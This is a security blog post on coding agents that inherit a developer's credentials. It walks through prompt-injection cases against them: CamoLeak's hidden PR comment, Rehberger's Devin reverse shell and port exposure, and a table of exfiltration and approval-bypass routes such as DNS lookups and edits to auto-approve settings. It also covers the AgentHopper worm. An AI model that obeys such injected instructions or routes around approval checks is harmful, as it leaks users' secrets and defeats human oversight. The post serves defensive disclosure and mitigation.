agent-securitytrust-boundariescoding-agentsprompt-injectioncredential-security

Your Coding Agent Has Your Keys: A Trust Boundary Analysis

When you run a coding agent, it can read every credential on your machine (SSH keys, cloud tokens, API secrets) without asking. It asks before running commands, but the permission is 'allow this command,' not 'allow access to this credential.' The security boundary everyone focuses on is on the wrong side. The real attack surface is the input to the agent's reasoning, not the output.

Anshal Dwivedi

April 6, 2026·13 min read

In October 2025, Legit Security disclosed a vulnerability in GitHub Copilot Chat they called CamoLeak. A security researcher had placed a hidden HTML comment inside a pull request. Invisible when rendered in GitHub's web UI, but fully visible to Copilot when it parsed the raw markdown. The comment contained instructions: search the repository for AWS keys, encode each character of the result as a specific image URL, and render the output.

Copilot followed the instructions. It found the secrets. It encoded them character by character using GitHub's own Camo image proxy (a service designed to prevent tracking) as the exfiltration channel. The victim's browser fetched each 1x1 pixel image in sequence through camo.githubusercontent.com, a domain the Content Security Policy explicitly trusts. The attacker's server logged the sequence of requests and reconstructed the secret.

The developer saw nothing unusual. Copilot's response looked normal. The images were invisible. The CSP didn't fire. No alerts triggered.

Legit Security scored it CVSS 9.6. GitHub's fix was to disable image rendering in Copilot Chat entirely: not a surgical patch, but the removal of an entire exfiltration channel.

CamoLeak is instructive not because of the specific mechanism (GitHub has patched it), but because of the structural condition it exploited: Copilot operated with the developer's full repository access, and a PR comment controlled its intent. The agent had the developer's credentials. An untrusted input had the agent's reasoning. That gap is the subject of this post.

The Implicit Handshake#

When you install a coding agent (Claude Code, Cursor, Windsurf, Copilot) and run it in your terminal or IDE, a transfer of authority happens that is easy to miss.

These agents do ask for permission. Claude Code shows you the bash command before running it. Cursor asks before executing terminal commands. This is real, and it matters. But the permission operates at the wrong level of abstraction. The dialog says "Allow git push?" It does not say "Allow access to your SSH keys for this operation." The dialog says "Allow curl?" It does not say "Allow authenticated HTTP requests using secrets from your environment."

And reading files requires no approval at all. In Claude Code, the Read tool is always-allowed. The agent can silently read ~/.aws/credentials, ~/.ssh/id_rsa, your .env files, and your shell history without triggering any prompt. It needs your approval to execute commands, but it can see every credential on your machine from the moment it starts.

Here is what a local coding agent can read without any approval:

Credential	Location	What It Enables
SSH keys	`~/.ssh/id_rsa`, `id_ed25519`	Push to any Git remote you can access
Git identity	`~/.gitconfig`	Commit and sign code as you
AWS credentials	`~/.aws/credentials`, env vars	Provision infrastructure, read production data
GCP credentials	`application_default_credentials.json`	Access any GCP service you're authenticated to
Kubernetes config	`~/.kube/config`	Deploy to clusters, read secrets
Environment files	`.env`, `.env.production`	Every API key, database URL, service token in the project
npm/PyPI tokens	`~/.npmrc`, `~/.pypirc`	Publish packages as you
Shell history	`~/.bash_history`, `~/.zsh_history`	Passwords typed as arguments, internal URLs
Cloud CLI sessions	`~/.config/gcloud/`, `~/.azure/`	Active sessions with whatever roles you hold

This is ambient authority. The agent doesn't request access to specific credentials. It inherits everything your user account can reach, because it runs as your user. The permission model that exists (command approval) controls what the agent does, not what it can see or what credentials those commands carry.

Compare this with other tooling. When you OAuth into a third-party app, you see a scope consent screen: "This app wants to read your email." When you add a GitHub Action, it gets a scoped GITHUB_TOKEN with permissions you define in the workflow file. When a coding agent runs in your terminal, the permission model is: approve each command, but every approved command runs with your full credentials. There is no mechanism to say "run this aws command, but only with read access to S3, not full admin."

Cloud-hosted agents like Devin and GitHub's Copilot Coding Agent are architecturally different. They run in isolated VMs or containers where credentials must be explicitly provisioned. But the agents most developers use daily (Claude Code, Cursor, Windsurf, Copilot Chat in VS Code) run locally, with full ambient authority.

The Poisoned Context Problem#

If the agent's credentials are yours, who controls the agent's intent?

The obvious answer is: you do. You type the prompt. You describe the task. But the prompt is only one input to the agent's reasoning. It's not even the largest one.

A coding agent builds its decisions from everything in its context window. That context includes your prompt, but it also includes project files, dependency documentation, PR descriptions, issue comments, web pages the agent browses, MCP tool descriptions, and repository configuration files. Most of this content is not yours, and much of it is untrusted.

Your prompt                          ← trusted
  Project files you wrote            ← mostly trusted
    Cloned dependency READMEs        ← untrusted
      PR comments from contributors  ← untrusted
        Web pages the agent browses  ← untrusted
          MCP tool descriptions      ← untrusted
            Rules files from repos   ← untrusted

This is the context supply chain. Every layer influences the agent's behavior, and every layer below your prompt is a potential injection point. The agent reasons over all of it indiscriminately. There is no "trusted" bit on a token in the context window.

CamoLeak exploited the PR comment layer. But the same structural condition exists at every layer, and researchers have demonstrated exploitation at each one.

Three Stories About the Same Problem#

Story 1: Devin Opens Your Ports to the Internet#

In August 2025, security researcher Johann Rehberger spent $500 on a Devin subscription and systematically tested it for prompt injection. He planted instructions on a website he controlled. When Devin was tasked with investigating a GitHub issue that linked to that website, it followed the link and read the attacker's instructions.

The instructions told Devin to download a binary from an attacker-controlled server and execute it. The binary was a Sliver C2 agent, a legitimate red-team tool that establishes a reverse shell. When the first execution attempt failed with a permission error, Devin independently opened a new terminal, ran chmod +x on the binary, and tried again. The reverse shell connected. Rehberger had full remote access to Devin's environment, including AWS credentials stored there.

But the scariest finding was a separate exploit. Devin has an undocumented built-in tool called expose_port that generates a public URL on the devinapps.com domain, making any local port accessible from the internet. There is no confirmation dialog. No IP restriction. Rehberger demonstrated a multi-stage prompt injection that caused Devin to start a Python file server exposing the local filesystem, then invoke expose_port to make it publicly accessible, then exfiltrate the public URL to the attacker via a markdown image rendering trick.

A prompt injection on a web page gave a remote attacker a public URL to every file in Devin's environment.

Rehberger reported all findings to Cognition on April 6, 2025. After an initial acknowledgment, no fixes were communicated and no coordinated disclosure happened. He published after waiting over 120 days, exceeding the standard 90-day responsible disclosure window.

Story 2: The Agent Ships Your Secrets Faster Than You Can Review Them#

An agent generates a config file. It works. The developer reviews the diff for correctness, not for credentials. The commit ships with a hardcoded API key that the agent pulled from context, or invented as a placeholder, or copied from a Stack Overflow answer in its training data. The pre-commit hook that would have caught it wasn't installed, because the project is three days old and moving fast.

GitGuardian's 2026 State of Secrets Sprawl report measured this at scale. They analyzed 1.94 billion public GitHub commits from 2025 and identified Claude Code-assisted commits using the Co-Authored-By git trailer. The finding: 3.2% of Claude Code-assisted commits contained at least one hardcoded secret, roughly double the 1.5% baseline. At the peak in August 2025, Claude Code commits hit 31 secrets per 1,000 commits.

Some context on that number. It's a per-commit metric, and Claude Code commits are consistently ~2x larger than human-only commits, so part of the gap is surface area. GitGuardian does not frame it as a tool failure. They point to speed (developers accepting generated code without credential review), volume (more lines per commit, more places for a secret to hide), and the 54% of GitHub developers in 2025 who made their first commit that year. After the release of Claude Sonnet 4.5 in late September 2025, the leak rate converged with baseline by December.

But the months-long window of elevated exposure affected millions of commits. And the broader trajectory is stark: 28.65 million new hardcoded secrets were pushed to public GitHub in 2025, a 34% year-over-year increase. Secrets are growing 1.6 times faster than the developer population. The agent didn't create this problem. It accelerated it.

Story 3: Every Agent, Same Vulnerability#

Rehberger didn't stop at Devin. Through August 2025, in what Simon Willison called "The Summer of Johann," he published 29 vulnerability reports in 31 days, testing every major coding agent on the market. The results were remarkably consistent.

Agent	Vulnerability
Claude Code	Pre-approved commands (`ping`, `dig`) used as DNS exfiltration channels
Cursor	Mermaid diagram rendering exploited for invisible image-based data exfiltration
GitHub Copilot	Tricked into editing `~/.vscode/settings.json` to set `"chat.tools.autoApprove": true`
Google Jules	Unrestricted outbound internet access; markdown image exfiltration; invisible Unicode injection
Amazon Q	Secrets leaked via DNS; remote code execution via prompt injection
Windsurf	Memory-persistent data exfiltration ("SpAIware"); prompt injection via invisible instructions
OpenHands	Environment variable exfiltration; malware download and execution
Amp Code	Manipulated into editing its own `settings.json` to enable unauthorized MCP servers

Every agent fell to the same structural pattern: untrusted content entered the context window, the agent followed the instructions in that content, and the instructions exercised the agent's ambient credentials in ways the developer never intended.

Rehberger distilled the pattern into a kill chain: prompt injection → confused deputy → automatic tool invocation. The attacks didn't need to bypass approval dialogs head-on. They worked around them: using pre-approved commands (Claude Code's ping and dig for DNS exfiltration), manipulating the approval system itself (Copilot editing settings.json to enable auto-approval), or exploiting features that never required approval in the first place (image rendering, file reads). The permission layer exists. The attacks route around it.

He also published AgentHopper, a proof-of-concept agent worm that propagates through Git repositories. A compromised agent injects prompt injection payloads into source code and pushes them to GitHub. When another developer's agent pulls the infected code, it gets compromised and repeats the cycle. The payload adapts per agent type: it modifies settings.json for Copilot, injects MCP server configs for Claude Code, and uses find -exec for Amazon Q.

A self-propagating prompt injection worm. In August 2025.

The Trust Boundary Diagram#

Every story above follows the same pattern. Here it is as a picture:

    ┌───────────────────────────────────────────────────────┐
    │              AGENT CONTEXT WINDOW                      │
    │                                                        │
    │   Your prompt                         (trusted)        │
    │   CLAUDE.md / .cursorrules            (semi-trusted)   │
    │   Project source code                 (semi-trusted)   │
    │   Dependency docs and READMEs         (untrusted)  ←── poisoned here
    │   PR descriptions and comments        (untrusted)  ←── or here
    │   Web pages browsed during research   (untrusted)  ←── or here
    │   MCP server tool descriptions        (untrusted)  ←── or here
    │   Cloned repository config files      (untrusted)  ←── or here
    │                                                        │
    └──────────────────────┬────────────────────────────────┘
                           │
                    Agent Reasoning
                           │
                    ┌──────▼──────┐
                    │  Approval   │  ← the command looks legitimate
                    │   Prompt    │
                    └──────┬──────┘
                           │
            ┌──────────────┼──────────────┐
            ▼              ▼              ▼
      Your SSH keys   Your .env     Your cloud creds

The approval prompt is a real security control. It prevents a meaningful class of accidents. But it asks the wrong question. "Allow git push?" is not the same question as "Allow the agent to push a commit that a PR comment instructed it to create?" "Allow curl?" is not the same as "Allow an HTTP request to an attacker's server with secrets from your environment in the payload?" The command looks legitimate. The intent behind it is shaped by content you never reviewed.

In security, this is the confused deputy problem (Norm Hardy, 1988). A deputy (the agent) acts on behalf of a principal (you) using the principal's authority (your credentials). The attack works because a different principal (untrusted content in the context window) controls the deputy's intent while you supply the deputy's authority. The deputy is confused about on whose behalf it is acting. The approval prompt doesn't resolve this confusion, because the prompt shows the action, not the reason for the action.

What You Can Do Today#

The fundamental fix (scoped, per-agent credential delegation with task-specific authority) doesn't exist yet for local coding agents. No major agent implements per-command environment variable filtering, credential vaulting with just-in-time access, or capability-based security where the agent requests specific credentials and you approve each one.

That doesn't mean you're defenseless. The mitigations below reduce the blast radius when (not if) untrusted content influences your agent's behavior.

Use short-lived credentials instead of long-lived keys. aws-vault stores your AWS credentials in the OS keychain and issues temporary STS sessions. If an agent exfiltrates a session token, it expires in hours. aws sso login works similarly. The same principle applies everywhere: GitHub fine-grained PATs with repository-level scope and expiration. Database users with read-only access for development. Short-lived tokens limit the window of exploitation.

Run pre-commit secret scanning. Tools like gitleaks and trufflehog in a pre-commit hook catch secrets before they reach the repository. This directly addresses the GitGuardian finding: the agent generates code with an embedded credential, the hook blocks the commit, you see the problem before it ships. The agent doesn't bypass hooks unless it runs --no-verify, which should be a red flag.

Scope your shell environment. direnv loads and unloads environment variables when you enter and leave directories. Keep production credentials in a separate directory's .envrc that you never open with an agent. For stronger isolation, run the agent inside a VS Code Dev Container with only the credentials the current task requires, explicitly mounted.

Use ssh-add -c for SSH key confirmation. This flag requires OS-level confirmation every time your SSH key is used. When the agent runs git push, you see a system dialog asking to confirm the key use. It's an extra click, but it makes SSH key abuse visible.

Audit rules files before running agents in cloned repositories. .cursorrules, CLAUDE.md, .github/copilot-instructions.md: these files shape agent behavior and are checked into repositories. Treat them like you'd treat a Makefile: they're executable configuration. A malicious rules file in a forked repo can reshape how the agent operates on your machine with your credentials.

Be specific with tool approval patterns. In Claude Code, configure .claude/settings.json with specific allowedTools patterns rather than blanket approvals. Bash(make *) and Bash(go test *) are meaningfully safer than Bash(*). The narrower the pattern, the less room for a confused deputy to exercise unexpected authority.

Treat agent sessions like CI/CD pipelines. The credential hygiene practices that are standard for CI/CD (scoped tokens, no long-lived secrets, explicit secret injection, audit logging) apply directly to coding agent sessions. You wouldn't put your personal AWS root keys in a GitHub Actions workflow. Don't leave them accessible to your coding agent either.

The Structural Gap#

Every mitigation above is a workaround. The structural problem remains: local coding agents inherit the Unix user model's ambient authority without inheriting any of the decades of work on capability-based security, mandatory access controls, or least-privilege enforcement.

The OWASP Top 10 for Agentic Applications, published in December 2025, names this directly. ASI03, "Agent Identity & Privilege Abuse," describes the risk when agents operate with excessive, unscoped, or inherited privileges. Their recommended mitigations (scoped short-lived credentials, distinct agent identity, runtime privilege boundaries, just-in-time credential access) read like a spec for a system that doesn't exist yet.

The industry has two early models for what isolation could look like. Devin runs in a cloud VM where credentials are explicitly provisioned rather than inherited. GitHub's Copilot Coding Agent runs in a container with a scoped GITHUB_TOKEN. Both demonstrate that isolation-by-architecture is possible. But neither model applies to the agents developers use every day in their terminals and IDEs, and neither provides fine-grained, per-task credential scoping.

The question isn't whether coding agents should have access to credentials. They need credentials to do useful work. The question is whether "all credentials, all the time, with no scoping, no audit trail, and intent shaped by untrusted input" is a reasonable default. It is the default today. For every major local coding agent. On every developer's machine.

The trust boundary diagram in this post isn't a theoretical framework. It's a description of what is happening right now, on millions of machines, every time a developer asks an agent to help with a pull request.

Sources#

Prompt Injection Is Not the Incident

Prompt injection detection is getting better, but what happens when the exploit doesn't look like an exploit? We split a credential-stealing attack across two normal-looking tickets and watched a coding agent execute both. The fix isn't better detection. It's controlling what agents can do.

June 8, 2026·13 min read

Agents Can't Wait for Permission

When an agent spawns a sub-agent mid-task, that sub-agent needs access it was never provisioned for, and at machine speed no human can grant it in time. Hand it the parent's full access and one prompt injection owns everything; hand it nothing and delegation breaks. The fix is a permit: a signed, scoped, time-boxed grant the agent issues itself, one that can only ever narrow.

All posts

Related posts

Prompt Injection Is Not the Incident

Agents Can't Wait for Permission